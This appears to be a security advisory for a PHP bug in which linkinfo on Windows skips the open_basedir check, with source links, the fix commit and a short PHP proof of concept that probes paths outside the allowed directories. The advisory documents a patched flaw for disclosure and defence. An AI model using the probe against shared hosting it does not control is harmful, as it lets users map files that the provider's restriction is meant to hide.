https://bugs.php.net/bug.php?id=76459
linkinfo function on windows doesn’t implement openbasedir check, it can be seen by reviewing the source code. This could be abused to find files on paths outside of the allowed directories.
Windows: https://github.com/php/php-src/blob/master/ext/standard/link_win32.c#L88
Unix: https://github.com/php/php-src/blob/master/ext/standard/link.c#L85
<?php
$var1=“c:\jump”;
print “checking $var1 …”.PHP_EOL;
print @linkinfo($var1).PHP_EOL;
$var1=“c:\jump\folder\file1.txt”;
print “checking $var1 …”.PHP_EOL;
print @linkinfo($var1).PHP_EOL;
$var1=“c:\jump\blabla”;
print “checking $var1 …”.PHP_EOL;
print @linkinfo($var1).PHP_EOL;
Warning: linkinfo(): open_basedir restriction in effect
http://git.php.net/?p=php-src.git;a=commit;h=289cb0f77c28b80a779170711f5e4e92cdd4fbdb
http://php.net/ChangeLog-5.php#5.6.37
Bypass openbasedir restriction set by hosting provider on a shared environment
http://php.net/manual/en/ini.core.php#ini.open-basedir